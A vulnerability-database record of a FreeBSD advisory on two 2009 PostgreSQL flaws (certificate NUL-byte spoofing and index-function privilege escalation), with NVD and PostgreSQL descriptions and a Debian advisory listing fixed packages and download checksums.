ID E7BC5600-EAA0-11DE-BD9C-00215C6A37BB Type freebsd Reporter FreeBSD Modified 2009-11-20T00:00:00
Description
PostgreSQL project reports:
PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,
8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,
and 8.4.x before 8.4.2 does not properly handle a '\0' character
in a domain name in the subject's Common Name (CN) field of an
X.509 certificate, which (1) allows man-in-the-middle attackers
to spoof arbitrary SSL-based PostgreSQL servers via a crafted
server certificate issued by a legitimate Certification Authority,
and (2) allows remote attackers to bypass intended client-hostname
restrictions via a crafted client certificate issued by a legitimate
Certification Authority, a related issue to CVE-2009-2408.
PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,
8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,
and 8.4.x before 8.4.2 does not properly manage session-local
state during execution of an index function by a database
superuser, which allows remote authenticated users to gain
privileges via a table with crafted index functions, as
demonstrated by functions that modify (1) search_path or
(2) a prepared statement, a related issue to CVE-2007-6600
and CVE-2009-3230.
{"id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "bulletinFamily": "unix", "title": "postgresql -- multiple vulnerabilities", "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "published": "2009-11-20T00:00:00", "modified": "2009-11-20T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "reporter": "FreeBSD", "references": [], "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "type": "freebsd", "lastseen": "2018-08-31T01:15:23", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}], "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "cfe5b2e5ae6f1fd520ccacafb8c060e57d7a717c1abe120047e5eb19bb0d92bf", "hashmap": [{"hash": "ec60428f116163768ff76fff3559dcdf", "key": "affectedPackage"}, {"hash": "d57fdf9663b1f21f3d71ab16216e03cd", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "modified"}, {"hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "b23cdf87f527a1184c3bb8d83fab7399", "key": "href"}, {"hash": "42a2d49add379e74e5c6d4f2d78e46aa", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "lastseen": "2018-08-30T19:15:28", "modified": "2009-11-20T00:00:00", "objectVersion": "1.3", "published": "2009-11-20T00:00:00", "references": [], "reporter": "FreeBSD", "title": "postgresql -- multiple vulnerabilities", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:15:28"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}], "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "\nPostgreSQL project reports:\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly handle a '\\0' character\n\t in a domain name in the subject's Common Name (CN) field of an\n\t X.509 certificate, which (1) allows man-in-the-middle attackers\n\t to spoof arbitrary SSL-based PostgreSQL servers via a crafted\n\t server certificate issued by a legitimate Certification Authority,\n\t and (2) allows remote attackers to bypass intended client-hostname\n\t restrictions via a crafted client certificate issued by a legitimate\n\t Certification Authority, a related issue to CVE-2009-2408.\n\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23,\n\t 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9,\n\t and 8.4.x before 8.4.2 does not properly manage session-local\n\t state during execution of an index function by a database\n\t superuser, which allows remote authenticated users to gain\n\t privileges via a table with crafted index functions, as\n\t demonstrated by functions that modify (1) search_path or\n\t (2) a prepared statement, a related issue to CVE-2007-6600\n\t and CVE-2009-3230.\n\n", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "304abb7ee96c02f0d26bcf013105e2e0c753b46368969b98831175a1da81b63a", "hashmap": [{"hash": "ec60428f116163768ff76fff3559dcdf", "key": "affectedPackage"}, {"hash": "d57fdf9663b1f21f3d71ab16216e03cd", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "published"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "6dd8cfdffb38b85e82a7efd63da62862", "key": "modified"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0", "key": "title"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "b23cdf87f527a1184c3bb8d83fab7399", "key": "href"}, {"hash": "42a2d49add379e74e5c6d4f2d78e46aa", "key": "cvelist"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html", "id": "E7BC5600-EAA0-11DE-BD9C-00215C6A37BB", "lastseen": "2016-09-26T17:24:50", "modified": "2009-11-20T00:00:00", "objectVersion": "1.2", "published": "2009-11-20T00:00:00", "references": [], "reporter": "FreeBSD", "title": "postgresql -- multiple vulnerabilities", "type": "freebsd", "viewCount": 1}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2016-09-26T17:24:50"}], "edition": 3, "hashmap": [{"key": "affectedPackage", "hash": "ec60428f116163768ff76fff3559dcdf"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "42a2d49add379e74e5c6d4f2d78e46aa"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "d57fdf9663b1f21f3d71ab16216e03cd"}, {"key": "href", "hash": "b23cdf87f527a1184c3bb8d83fab7399"}, {"key": "modified", "hash": "6dd8cfdffb38b85e82a7efd63da62862"}, {"key": "published", "hash": "6dd8cfdffb38b85e82a7efd63da62862"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "e723dd6bd11a0bf4d36aa8e24c09d2a0"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "304abb7ee96c02f0d26bcf013105e2e0c753b46368969b98831175a1da81b63a", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4034", "CVE-2009-4136"]}, {"type": "postgresql", "idList": ["POSTGRESQL:CVE-2009-4034", "POSTGRESQL:CVE-2009-4136"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1964-1:7EE9B"]}, {"type": "nessus", "idList": ["SUSE_POSTGRESQL-6768.NASL", "SUSE_11_POSTGRESQL-100111.NASL", "SUSE_11_POSTGRESQL-100108.NASL", "FREEBSD_PKG_E7BC5600EAA011DEBD9C00215C6A37BB.NASL", "FEDORA_2009-13381.NASL", "DEBIAN_DSA-1964.NASL", "UBUNTU_USN-876-1.NASL", "SUSE_11_2_POSTGRESQL-100111.NASL", "SUSE_11_1_POSTGRESQL-100108.NASL", "SUSE_11_0_POSTGRESQL-100108.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:66566", "OPENVAS:1361412562310100400", "OPENVAS:136141256231066566", "OPENVAS:66569", "OPENVAS:840360", "OPENVAS:136141256231066569", "OPENVAS:1361412562310840360", "OPENVAS:66611", "OPENVAS:136141256231066611", "OPENVAS:880398"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10473", "SECURITYVULNS:DOC:22944"]}, {"type": "ubuntu", "idList": ["USN-876-1"]}, {"type": "seebug", "idList": ["SSV:15154", "SSV:15096", "SSV:15095", "SSV:15097", "SSV:15153"]}, {"type": "redhat", "idList": ["RHSA-2010:0429", "RHSA-2010:0428", "RHSA-2010:0427"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0427", "ELSA-2010-0429", "ELSA-2010-0428"]}, {"type": "centos", "idList": ["CESA-2010:0427", "CESA-2010:0428", "CESA-2010:0429"]}, {"type": "gentoo", "idList": ["GLSA-201110-22"]}], "modified": "2018-08-31T01:15:23"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "postgresql-server", "packageVersion": "7.4.27"}, {"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "eq", "packageFilename": "UNKNOWN", "packageName": "postgresql-client", "packageVersion": "7.4"}]}
{"cve": [{"lastseen": "2018-10-11T11:33:54", "bulletinFamily": "NVD", "description": "PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.", "modified": "2018-10-10T15:48:12", "published": "2009-12-15T13:30:01", "id": "CVE-2009-4034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4034", "title": "CVE-2009-4034", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-11T11:33:54", "bulletinFamily": "NVD", "description": "PostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.", "modified": "2018-10-10T15:48:24", "published": "2009-12-15T13:30:01", "id": "CVE-2009-4136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4136", "title": "CVE-2009-4136", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "postgresql": [{"lastseen": "2018-02-15T15:10:41", "bulletinFamily": "software", "description": "NULL Bytes in SSL Certificates can be used to falsify client or server authentication. This only affects users who have SSL enabled, perform certificate name validation or client certificate authentication, and where the Certificate Authority (CA) has been tricked into issuing invalid certificates. The use of a CA that can be trusted to always issue valid certificates is recommended to ensure you are not vulnerable to this issue.", "modified": "2009-12-15T13:30:01", "published": "2009-12-15T13:30:01", "href": "https://www.postgresql.org/support/security/8.4/", "id": "POSTGRESQL:CVE-2009-4034", "type": "postgresql", "title": "Vulnerability in core server (CVE-2009-4034)", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-15T15:10:41", "bulletinFamily": "software", "description": "Privilege escalation via changing session state in an index function. This closes a corner case related to vulnerabilities CVE-2009-3230 and CVE-2007-6600 (below).", "modified": "2009-12-15T13:30:01", "published": "2009-12-15T13:30:01", "href": "https://www.postgresql.org/support/security/8.4/", "id": "POSTGRESQL:CVE-2009-4136", "type": "postgresql", "title": "Vulnerability in core server (CVE-2009-4136)", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:12:51", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1964-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nDecember 31, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : postgresql-7.4, postgresql-8.1, postgresql-8.3\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2009-4034 CVE-2009-4136\n\nSeveral vulnerabilities have been discovered in PostgreSQL, a database\nserver. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nIt was discovered that PostgreSQL did not properly verify the Common\nName attribute in X.509 certificates, enabling attackers to bypass the\n(optional) TLS protection on client-server connections, by relying on\na certificate from a trusted CA which contains an embedded NUL byte in\nthe Common Name (CVE-2009-4034).\n\nAuthenticated database users could elevate their privileges by\ncreating specially-crafted index functions (CVE-2009-4136).\n\nThe following table shows fixed source package versions for the\nrespective distributions.\n\n oldstable/etch stable/lenny testing/unstable\n postgresql-7.4 7.4.27-0etch1\n postgresql-8.1 8.1.19-0etch1\n postgresql-8.3 8.3.9-0lenny1 8.3.9-1\n postgresql-8.4 8.4.2-1\n\nIn addition to these security fixes, the updates contain reliability\nimprovements and fix other defects.\n\nWe recommend that you upgrade your PostgreSQL packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1.diff.gz\n Size/MD5 checksum: 40781 7e87c7dba806e8f17527ecd44f3b21ad\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19.orig.tar.gz\n Size/MD5 checksum: 11535709 64185bcc279f0787017d89596ad519a0\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27.orig.tar.gz\n Size/MD5 checksum: 10060890 ec501383ae38f79397c50ecf62e4eda5\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1.dsc\n Size/MD5 checksum: 1179 9a2edb5a2dfe632748f7ad720c7c9ea2\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1.diff.gz\n Size/MD5 checksum: 36672 7d7f09f39c682a1d618e3c1e82615410\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1.dsc\n Size/MD5 checksum: 1134 b7487381adfbf4dbbf4972c66cbe6c85\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-server-dev-7.4_7.4.27-0etch1_all.deb\n Size/MD5 checksum: 531632 739cdd7ee12a7ebd4b8becceba7ff010\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.19-0etch1_all.deb\n Size/MD5 checksum: 1521982 29989a9668481d64a22906e8a8cb39e6\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-doc-7.4_7.4.27-0etch1_all.deb\n Size/MD5 checksum: 1193124 542a60916e16ac48b7b6651602c44891\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 4502226 e2dfd3a9f3f2a5a75c79928365ab9909\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 190990 89c0b64ed243f6700565d5bd9180b546\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 208112 db08e4d3ec3fd6cf9004aaf27af768cc\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 309566 d43ff3e642a9f5a8cf152c53e6eb0180\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 3564690 161bb786e8346cd468f7e34d1ab58163\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 408774 0808d56612830c11d0ec885f781e314c\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 202052 c3e002b2147c915eb931c2ca3f1f1586\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 130734 89c3fe836c139046efab77a24c40c863\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 135176 3d0354c8d4a60861454aa1b4aea815bd\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 636558 217e48ee927f9f6d04f15f090b749c33\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 395264 365955de78195ae80bdb71fdfc6f7866\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 201444 dcc95b6d02765eed0f62958ff07a816e\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 642668 8024d7e71c4d0c6ceeb7fd24250f5d3d\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 1178810 558adcd31507ecc690ab5898b6fc65f6\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 1531260 ab0f570730af883785c645d8a8b3d341\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_alpha.deb\n Size/MD5 checksum: 134020 900bb0daf468d3b3d6a0b40b823024a4\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 691856 4f8ad48774fbcf32c411eff4ee0cb315\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 216142 2acc502c13ae1be6175046f23319ff15\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_alpha.deb\n Size/MD5 checksum: 213714 c7b4c7a26729288aff50f6944011713b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 656438 14df0774b67e18f1c41b1a186d3cd962\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 597174 a3c2f201ae8310a3e1ee225f0f1d514d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 1480390 b2632a59e235fea5a2521f745c75fb46\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 200790 7fa613854da07118aaec3caf29d0f170\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 636894 793607b6eec9c02530f48ed103c31edb\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 200192 d397d82ee9b8c5d8c7e8530a0bf2cca1\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 382206 aecea199438ff3d8aa362764034b541b\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 1135084 b8df44d3616f063154896546409469b3\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 133374 406bb9a8b90d5b9dd1e95344f412ddb4\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 211782 19bac9b0140aee67391b1c3b7c546fae\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 364756 78d093848b91c945ce72bcb7924e16a0\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 129786 fe8737fe50a30c8a4643590783a00200\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 206526 061d4185a7541a368c39373d5468ac43\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 210772 75a09f316db5d7dd4f45b824bcd8cbc0\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 190058 f16105b82e7936939593b5a4dd6c4f50\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 4389894 1ed6f95456bc9ce64ca09f779fb36e5e\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 3463854 ce3b373df1bcd00e6514a0f764521b3a\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.19-0etch1_amd64.deb\n Size/MD5 checksum: 302890 87895627f59fec38a42ac59e073fa1b6\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_amd64.deb\n Size/MD5 checksum: 134290 3308dd7ba774b2550dade127f98bce53\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 211412 ce7b7b5a1757e494bd43f26d2fc6467b\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 199058 67be91ec04255f305f5c6971e37f3eb5\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 625266 e378c5f25a4ce1873b6e2e708e579e75\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 348232 dc0b092aba5a8555ab226ea8eec4681d\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 200350 cf7750771cb0d03972a0e4ab60c3e69c\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 131666 ea9c474ef82b95a5ac1462eb05bfbbe7\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 133820 83d193493b2a866ad9b7dcb4a9c7ed3b\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 1109852 de773c44ef848d1305d267aa8bd46827\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 369240 488289dae52742f084f425cf42a0702e\n http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.27-0etch1_arm.deb\n Size/MD5 checksum: 3412046 87094ba163a63f2b0008c4efef971ff0\n http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.19-0etch1_arm.deb\n Size/MD5 checksum: 189662 33ab9439063d71fee4df5fe998ddab4b\n 